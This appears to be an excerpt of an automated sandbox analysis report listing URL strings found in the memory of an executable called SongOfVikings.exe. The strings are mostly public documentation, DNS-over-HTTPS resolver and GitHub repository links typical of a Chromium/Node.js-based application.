Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://datatracker.ietf.org/doc/html/rfc7231#section-6.4
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://datatracker.ietf.org/doc/html/rfc7238
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dejavu-fonts.github.io/Download.html
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Tools/Web_Console#Styling_messages
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/PerformanceResourceTiming
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Equality_comparisons_and_sameness#Loose_equa
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://developers.cloudflare.com/1.1.1.1/privacy/public-dns-resolver/
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://developers.cloudflare.com/1.1.1.1/privacy/public-dns-resolver/Cloudflare
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://developers.google.com/android/guides/setup
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://developers.google.com/speed/public-dns/privacy
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://developers.google.com/speed/public-dns/privacyGoogle
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://dns.google/dns-query
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://dns.quad9.net/dns-query
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://dns.quad9.net/dns-querydns.quad9.netdns9.quad9.net9.9.9.9149.112.112.1122620:fe::fe2620:fe::
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://dns.sb/privacy/
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://dns.sb/privacy/DNS.SBhttps://doh.dns.sb/dns-query
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://dns10.quad9.net/dns-query
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://dns10.quad9.net/dns-querydns10.quad9.net9.9.9.10149.112.112.102620:fe::102620:fe::fe:10
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://dns11.quad9.net/dns-query
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://dns11.quad9.net/dns-querydns11.quad9.net9.9.9.11149.112.112.112620:fe::112620:fe::fe:11(
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://dns64.dns.google/dns-query
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://dnsnl.alekberg.net/dns-query
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://doh-01.spectrum.com/dns-query
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://doh-02.spectrum.com/dns-query
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://doh.cleanbrowsing.org/doh/adult-filter
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://doh.cleanbrowsing.org/doh/family-filter
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://doh.cleanbrowsing.org/doh/security-filter
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://doh.cox.net/dns-query
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://doh.cox.net/dns-querydot.cox.net68.105.28.1168.105.28.122001:578:3f::30
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://doh.dns.sb/dns-query
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://doh.familyshield.opendns.com/dns-query
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://doh.opendns.com/dns-query
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://doh.quickline.ch/dns-query
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://doh.xfinity.com/dns-query
Source: SongOfVikings.exe, 00000000.00000003.1903858433.0000000006525000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ejemplo.com.Se
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://encoding.spec.whatwg.org
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://encoding.spec.whatwg.org/#encode-and-enqueue-a-chunk
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://encoding.spec.whatwg.org/#encode-and-flush
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://encoding.spec.whatwg.org/#textdecoder
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://encoding.spec.whatwg.org/#textencoder
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://esdiscuss.org/topic/isconstructor#content-11
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://example.org
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://example.orgExpired
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://fetch.spec.whatwg.org/
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://fetch.spec.whatwg.org/#fetch-timing-info
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://gist.github.com/XVilka/8346728#gistcomment-2823421
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://git.io/debug_fd)
Source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://git.savannah.gnu.org/cgit/config.git/plain/config.guess
Source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://git.savannah.gnu.org/cgit/config.git/plain/config.sub
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Cyan4973/xxHash
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/GPUOpen-LibrariesAndSDKs/VulkanMemoryAllocator
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/GoogleChromeLabs/text-fragments-polyfill
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/KhronosGroup/SPIRV-Cross
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/KhronosGroup/SPIRV-Headers.git
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/KhronosGroup/SPIRV-Tools.git
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/KhronosGroup/Vulkan-Headers
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/KhronosGroup/Vulkan-Loader
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/RyanZim/universalify#readme
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/RyanZim/universalify.git
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Squirrel/Squirrel.Mac
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/TooTallNate/util-deprecate
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/WICG/scheduling-apis
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/WebAssembly/esm-integration/issues/42
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/WebBluetoothCG/web-bluetooth/blob/main/implementation-status.md
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/aawc/unrar.git
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/addaleax/eventemitter-asyncresource
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ashtuchkin/iconv-lite
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ashtuchkin/iconv-lite/wiki/Javascript-source-file-encodings
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ashtuchkin/iconv-lite/wiki/Node-v4-compatibility
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ashtuchkin/iconv-lite/wiki/Use-Buffers-when-decoding
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/broofa/node-mime
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/chalk/ansi-regex/blob/HEAD/index.js
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/chalk/supports-color
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/chromium/chromium/blob/HEAD/third_party/blink/public/platform/web_crypto_algorith
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/da-x/rxvt-unicode/tree/v9.22-with-24bit-color
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/facebook/react-native/pull/1632
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/feross/safe-buffer
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/google/caja/blob/HEAD/src/com/google/caja/ses/repairES5.js
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/google/caja/blob/HEAD/src/com/google/caja/ses/startSES.js
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/google/closure-compiler/wiki/Source-Maps
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/google/diff-match-patch/tree/master/javascript
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/google/distributed_point_functions
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/google/google-api-cpp-client/
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/google/ruy
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/google/ukey2
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/google/woff2
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/google/wuffs-mirror-release-c
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/google/xnnpack
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/heycam/webidl/pull/946.
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/iarna/unique-filename
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/iarna/unique-filename.git
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/iarna/wide-align
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/isaacs/color-support.
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/isaacs/minipass.git
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/isaacs/node-tar.git
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/isaacs/yallist.git
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/joyent/node
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/joyent/node/issues/1726
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/joyent/node/issues/3295.
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/juliangruber/brace-expansion
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/libuv/libuv/pull/1501.
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mafintosh/end-of-stream
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mafintosh/pump
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mafintosh/tar-fs
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mafintosh/tar-fs.git
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mafintosh/tar-stream
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mafintosh/tar-stream.git
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mikeal/tunnel-agent
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mysticatea/abort-controller
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node-addon-api
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node-addon-api#collaborators)
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node-addon-api/issues
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node-v0.x-archive/issues/2876.
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/commit/ec2822adaad76b126b5cccdeaa1addf2376c9aa6
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/commit/f7620fb96d339f704932f9bb9a0dceb9952df2d4
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/issues
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/issues/10673
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/issues/13435
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/issues/19009
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/issues/2006
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/issues/2119
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/issues/3392
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/issues/34532
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/issues/35452
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/issues/35475
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/issues/35862
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/issues/35981
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/issues/39707
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/issues/39758
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/issues/45699
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/12342
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/12607
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/13870#discussion_r124515293
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/1771#issuecomment-119351671
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/21313
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/26334.
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/27791
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/30380#issuecomment-552948364
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/30958
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/32887
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/33515.
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/33661
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/3394
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/34010
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/34103#issuecomment-652002364
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/34375
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/34385
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/35941
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/35949#issuecomment-722496598
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/36061#discussion_r533718029
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/38248
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/38433#issuecomment-828426932
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/38614)
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/43714
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/44952
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/46161
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/string_decoder
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/npm/node-semver.git
